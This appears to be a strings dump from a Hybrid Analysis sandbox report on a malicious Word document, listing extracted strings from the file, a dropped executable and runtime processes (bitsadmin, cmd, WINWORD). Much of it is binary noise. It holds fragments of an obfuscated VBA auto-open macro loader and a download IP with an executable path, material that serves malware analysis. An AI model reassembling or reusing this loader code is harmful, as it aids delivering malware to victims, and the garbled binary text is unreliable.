Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

QrUj>+?F/9sGEy`nP;~G4sY(b0[#G\aLq?0E~

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

QZ0laL4UE|~2'S)6PK5v1KI\Qj0Eh

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

r=p_?u_n1]x&s$$jE#.rHG+Mc5\yn<qza}s3u5xgE\2>c^>7TToL'|[_%^jn'H~UK9h

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

R]nEZeTdSlDKKJ ,4TEn/D9%gh'#rYNSH4CK| @hCaCL$K #B^0>3S I3DM$%~Np8i&#$XDyCKmAZ9e0p8:-Urc-qUceUbcgEpRW

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

R_f_r_nc__

Ansi based on Image Processing (screen_5.png)

rc|8%o;&y%}9,sZR?g}k

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RdhpG.[`Dm ?L.ijgiXA8 +$L2@iFdVXU'KK6tM5%W2CmP1LoT5#:bgt,!ZHp{,Tf]#pd}&iv3fXXk!M;|*[_h>!,~{Q[NfPeXj|qe=:jhTVG%QS*J%L$6D='Ienb~k3MHS^P\wr^+j~k~vttkMxvf<S0yE\KMzNq;R^*zyV-W*\Tv^xN-W)A$Z=WJWm:^|+OcPK!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RDk2B$pjT,F^Jd

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

rE1Kz4tFBWMyr7x~)xx%9$$A(o_:ZXWtUq-^a-Lfn:Mm0 `R`m-Mqc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RE\Microsoft\Shared Tools\MSINFO

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

RegCloseKey

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

RegOpenKeyExA

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

RegQueryValueExA

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Rehh&.T5=6k8$(R>Rt*5x] B[4

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

REListbox20W

Unicode based on Runtime Data (WINWORD.EXE )

REVJZ`Lho@HlNABxA*e9-,+pY+)T nLPZME$prAG 5@U@TB@E[@Q4ebUXj -.X^V(4<2VHJ+`]#*;z~>NRW1's:`^tHss~;`S LMG&-MI2U14lZu

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RGB(19485@0W06`8&P'A9B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

rJ($Rp3[:"8U@N$!uJKn<!5f14G5lG6l;{G5as^;{G6l7{DsfwG6l7{DsfwG6l7{DsfwG6l7{DsfF,9gu9f9flY9go#v0lY9fl#6n"9fl#6n#v0k9go#wY#Q[@UAtZJ\H8{Q.ohp

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RoKjbQjzOk

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

rr.A=Em"`<@`Gqk2b<R^>|Pp_V:higf)@5kC{5QAL&y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RS=adhN4A\Kvt+ggn)EZZSp!*,y9A`p+gi/.lV7EcA6rz%+CwK'PV=f KFDTWiSn1okL4fmkzu@Kf .PT@p`7

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

rstdole>stdoleP

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RV`RANj4JA`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

RvPSX[Q4~r}Og!sl\x-A}D)OSyrTm9-_*L6yq9kR=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

r~Tt#5.F+duTJTsYUl

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S""PMid(v, 4'c-H a>\AqM!!Y. E. _VBD[mFc

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S)YK]l|!5'^Pc%DX.$,C:0S')S

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S0FLr<@a^+y@$X WBg9cwT>|f;Wr\U}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

s666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666p62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ OJPJQJ_HmHnHsHtHL`L1KG=K9dCJ_HaJmHsHtHBA B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S8Y> `@-FG`0t@K%15"m=3@mvbHgAuUFR6,+,[_`M3\NuG@y2Wda!;#+M.~+R6((p :Cs'5+B)D("y0TbC;SLELb$`kHotk`gtrqfMBvr2UM]9IB5SiKa05_#)t2w%J(%(;:,SpF/1i<([NH2JErXN(Fw!,rR7@Bps0NsjqzSb%W,0Y>w01J

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S9:r]MD$in uhQK%ip{{|?"()^FC&$5P?6!+d$qo^AQ~,Er@zN_V={T<5N:CJa<'hej3;I+8A0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S?_}o'1V44"Project.ThisDocument.Document_Open"PROJECT.THISDOCUMENT.DOCUMENT_OPEN@@UnknownG.CxTimes New Roman5Symbol3.*CxArial7.@CalibriA$BCambria Math"1hDYvYg!r0jKHP$P2!xxadmadmOh+'0d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

San877340nEnd Fu8nctN f245997(ByVal{00243)

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

sB>a|c0G5aZ~EyOl(7

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

sCA5727177f245997(v2400427>CosDoCullamco dZ'Occaec]tempor@ qui $BqipsEr@scA. Qin <irureDB`EAadT84714Sp(vCC , "@"AVOfficiSli@pClenCZn=!Y volup5E.ex molB&<

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

sct_c_J_lnJ9r1_crcsc_crp0r_tl0nA__rl9htsr_s___d

Ansi based on Image Processing (screen_0.png)

SetProcessDEPPolicy

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

sg>dU96M-

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Sj`qIq}ji6C+35y_dL:(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

SOFTWARE\Microsoft\Shared Tools Location

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

SOFTWARE\Microsoft\Shared Tools\MSINFO

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

SpellingAndGrammarFiles_1033

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1036

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_3082

Unicode based on Runtime Data (WINWORD.EXE )

ss9k5}{nx>x7<s^9s^

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

SSRQHNVmML

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

StartSysInfo

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

STCCLICOSPAD

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

SubKeyRef

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

Syf8cS{(&PF&(Dv

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

S})WKhN8cA&<I3y|| r5(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

T3&Z)Urj;{M;L;pp<ZN`_[0~TO9gvGM.)JJREM}L}Di'd}9_ PV5%}OIT6AM]`2KC);h<i"qX|#C=!vTL~rAa;)_. AXixm]8BziZ\(6q.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

t;Zt5Q@Aj(K$`d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

T<@C?z^8u.ggcT\wNaA^/x>Oq_z<L#!l%v-vyF9FS%y5_2,X1PAA3RC0hq='px)ZZdS=BLnJhMOQr'm!/#LxAnVZNbx$N34H=M#NO/P;<t{_IDrq/,EiqM;YAl.>X/9+J/PdlFgvNF[x!6f&a,HVBKjFie$(CrcbXtI'~"w%qb!4l=jD|uYVu)B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

T][#fmh$+hV'Hm?4%u$iWEP=B_w%!roL8/"PL5B2<IEc%1iQX'r'Bed6V(`Dr.2S$gq'b(!t3@1.D&9C c

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Tb2"E$9q)L@SN61%$+nRa&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

temporS,gInt(oGdv7097f1D+ tNextA= v330126

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

The system cannot find the file %TEMP%\1.exe.

Unicode based on Runtime Data (cmd.exe )

ThisDocument=26, 26, 978, 452,

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

tkYRdJ46^>k$kdx5+w*OZkb\e%d0aCNIvXBr%m=}#g%&n!ZC#Vzl{5FZu<V;`1PoPgs#:PaW7Ki\nH-]$P2Kko b

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

tL)]%*G6JTM)@$2N6"t=%gmhnrI3(I2$d3B7t$%hinF\4sQ\M-yNclb@

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Tm73b(Z9D3F&"6IdVSx4"lN.VL 4l^eX-n@[i$I"a "57hPG3hf%I@A1q=$s&R80$38[B/SL_J;K-8R-8R-8O,u[Hss?,G2bF-i_rw7QL]L^_}{(dtFkg lvvrmzzzzzzzzz7&Kxx[6GtmHA&x.eje>x;c4$kozS<^2>%W5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}s_S_\5>8}O9}sP0O3`:V .!1AaQq 0P`@?:B+v`0v`0v`0v`0v`0v`0v`0v`0v`0v`0vzc\kw45&>?{`.~xO;`;`;`;`;`;`;`;`;`;`;`;`'BC[z_B!%uqT

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Tn9Cg}p iX^Ko;k\|F0&?s;g;9W~=$wkjS.I$I$I$I$I$I$I$I$I$I$I$?"G$l@ZH-r\

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

to]06By-`P&kBfhWGqit=?"YAUe(d 3{$wIVJ)^MUd^$,=d1h'3SeH'5~J VQj;

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

tPD,F$kwtvG>{6nP3W]8~3\hVb<1r2Cb

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

trF1JMs\\cW:xvTJ(]1c|xb;Lj8f3{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

TU m 6[F=rR4',Qocdb=!{m2k}|<vQ<E0n0*{3d2VEkDH4$/sYd-$#H7=b[3sb:yg$FRB]vs~GH:jA}9n>"hT2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

TwsnURUq{7:\):xq]W

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

tYiH%4_izNR)9a21A7f/O2U\=%edZP/b3PT

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U'}Kn~|;J&y<17nn^Fp^_1rVFn2FnQ

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U. PnF,e nU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U0q&qz1IpQp0%M0' _&1*'IpUp1Jp00z#<jN%q,0VAp#q,T0#3$1pq#0p1*1't5x>N221O(151!0

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u30~](FPCpB^_y8>5H6&m*S"y0'_s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u9@'!t^*bH)+?</xp8^/ax0^/ax08^/xp8^/ax0^/=?@iSvjN0uslNHz7Zw9Ja/`]X`=q8L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U;6[[XyB,}KUF4Z10s9+,4RU2\yc9nab4#@I8j"p3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u;P)lXnDKR#LFooYV-[GuB6[5QDUBm!Dpf"x]Q`m<zK`Xr7tuqxnWfWkazO]H0w'cqUEZCX^Pd\:@_mm5s'E6,D]A]rYWBF(z8[.1K3C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U>&;gY! UY>5I$5{

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u@wc4M&)!Xd.qm{+2/xS[13F/pi&MDRgMMd&[sx}P4=.OI@-_

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U[S=1("WSNpk a(OF;-QL

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u\7L@pAAc%JqD\$rHM )FeF"(()l7\P6[[aoqQ@R S.2U<)Xd\J7d"ZE

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u^(jejEB}xLuC`n$y1D^I:YLVv_ 6h*uN+FAhy3N")Y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u_VBA_PROJECT(

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

uF&gVy~F,fg+&pr&Z\qyyn XIv}*e1r-]$x0!$Q4Aqcp9sr{w^mtGb_Y<XF^;n^*23EG5O>,Ki{IAI')kl{BqWqjade'irw{!lUpyINHp"il8r%*H'-k|-A{k5Eoh7$JhPXsW`zks[VLm

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Umj{Lx#JBf6SIo*L=.4xk$v'i':y

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Unable to set notification interface - 0x80070534

Unicode based on Runtime Data (bitsadmin.exe )

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

uPJ3"kuWR#AO8:l_R<g< <|SP4%y@@8X}!AL]AQx2".8RF3?T2B'b-X^F'-Gd#t0>Tf@=ycK]TljunmjB\j7SL0st5MH>/iGqu~m}x>6C0gX`Y{i{J1"3&]w"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

URQzDCG-WQ^N]O:R6+U"goW;DBd$R_B<0-1#Mr(',knD6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

us P nulla. Volupe idhut

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

User-Agent:Mozilla/4.0

Unicode based on Runtime Data (bitsadmin.exe )

utl]u%q0BCx|

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U{3J'`)5A4FdyL8L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

U{mh+zOr"YGN9om37lPd6r<L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

u~rrW1nnx[>_k~vGjD)6h.H}<>GLS~]\l+yj]<yA@+i=\4n77%u/v)h|h0z}rE`p5Gz--Lo@?{_v^=yLm?iGSUdgf|<<*GVxN}IWpkg|&wb;E/N7U5F4iOP_9qRs{{)|3?7m_"q'v\!liX<?yx7>J

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v ,MThAMTIxQDE yMkAz`3QDM4QDI5aN0Ax`yNEAxMEA2MUAxOEA1`M0QDQy`I1`EaaYzIEy0`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v .>vC:Ci|lllHsi@.<s nAQhcomzof619350@D%S;Sin(#;H^AD@labon@pida_B

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v"!PT$U:HH>2>1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v#zN!B&9sQb`7y{?0{(]geTI1g\tN#K^r&u6e8c63Fb'{e<WhY#!{A,s%NS9aX1<E:s=kQa6"EWz0l6J0/1F+0w6(*vWk|7dyT[FQ#L2Z

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v$* = 3 + 8

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

V-5k_+Z~~y^oMkW_Gfb/(m<.{si}\Q&B!}9jHCc9fD01p/4rBu4!9tBf Cs87n2L8_a)xo"ad\7NoWo1<3l Eh8C!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

V0Z2;x:S@f^Lv`Wz1rau%&CJ4[+.=w$E+@W,$Eq@ J#@e.v7^rd ),$W2@C$4d`0qn+<\dd@ v#)Sx%N!l!v+Gnrn2Q;fZ<=,J\A'FMVn\EWZ@Sc,+\j*%CV&t3 %W#(LLu[gQ.`MT%<<COq,It*0JT\!+{x

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v135778 = v562@180 - &

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v216871 - v269444

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v427540 @= "1008 0528652<771268<93<121919<41623$97>67Call f92167Xv+

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v4L#A4`qYDYy1

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v6'+eNa~E<7R"6E:dO];<Ri`

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v615031 = Asc(Mid(v758456, v152021, 1))@135778v349656 + v877340MeF+<e Tv;WsLvmDz ym

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v6=+ vd'0I

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v710638 = "WDIX7TWp6wlOLLj1OhkJ2yRSUy7f37V2UynYXYaydsfiEEsHzPJmhCwjYQqWBseZqeHPtexGXrSxDcek05pXPIca7xqEfcajs0GHwSB24uQhFXOz00jmKVt9IbsOpAiGQSuY0vO83Cl44QlxDtpILnx0shnN9czbFGivdyncNK0I4skR2gfz1nHbDy61cSInxoohhoSxuWlS0tzAzdq0eJsh7s7mGTbSaZJH6rdcnKJz4z98XXkZkS7A2LZlj0lB5FCCp3KEVXoq9o69NGhLsJPz8y1nPQCgNx4DbBdC9IeJB7sXYl1OcyYDjZ7HenSfOQJLX6PhzwxDkA1GPCeBVNDbRcCeJVSYDPk9lcsXVZURRjqU5amazDKXOUGAbxzYbCfQYtjKT5n6cR4b45gCnl5xBUbQ0wCfZNPqhO7KtOERY4rtSIFYmzSHXisHOFAwtiL7zb5JviKdrTo0P3kgwq6dhnvL6GfR6kZq74QaF8gFo7T1xVnw5vI4hU00WDGN13ESyPWEiuA2ZwKjZgiRXuCPT7X5AYBlFcgWxvTJyCh2r7SCk29595582534(2346

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

V7[7ThisDocument __SRP_2t__SRP_3

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v:P-=)uf5d6!mRCXkrxZR[i=Yr(f5VPo*Lc{:Ehp8i5t;~*\:Mynl'QHvXoRQC&K219CNk

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

V@&KwboaV9(dwSRB6

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

v_R_plac_

Ansi based on Image Processing (screen_5.png)

VBAFiles

Unicode based on Runtime Data (WINWORD.EXE )

VB}*UtJ wL]#{}DPht7i<m' :

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

VCnisi6 (a%Ccill`Cexceptte@oR- "C

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

vL= "kGTzwjKFHSPLzf4gDqXLp4z8KGm2Rmp3wNxQjksipAr0RULSYkgQRWAAUugUWLoGPS2w45vjRvRFWzSl0GHYckvWbHOYgFSRH5oj"p631517 qHyF7Rd7bjOQBaenYsLyDyDFnr3ERqFnVebocsuujLUxvzD1rUuCXW61NUnGD8hUJKIdEAI0HI186awy15pwTCh7sDkcPfHeG0pzBpXs45::3398562

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

VLQ4DXx"M1.:E4C\Pr?/:Wm;e5CuMiW)q0:HBdgn&v=HK`sdTR3z\~`js`mAj-&4D;55bV[:4W|;^I<?|?|!yhh;>k=?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|?|Oc.~9OHyw:p=5}{nx>x7<s^9s^

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

vm]rVP_8L

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

Vs>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+9>|z+99z)K

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

VynW&u}U

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

W&Vgi@PNS1oRj! \6Z`%`q@PPQ7P

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

W'+mO~'xMu]u]u]uzA+mO~'xk'x/~Mz^kE7c:&3=i3wL7Y|K3=7q%s.#"72tD At0JZ^sldTLr7~4['Uul36b4SH,uo(E?{3[%l6w69SIJ :6a7FNR&:.jtMBH?;XgK?H7s12"Ub6tgqXDO.KM$n$."I!r!1$$rH8eadYC"s]PR

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

w,>tp]Rzz'9L"$9_k]eGQ0/$JAs" B\^rz;f>/k]znzT<co@V

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

W,D+`NSJe

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

W0JW<4v7;'|W27W|zQ:gi(G*Z80Ah"+QW)K|*BuhgN,GcOW0

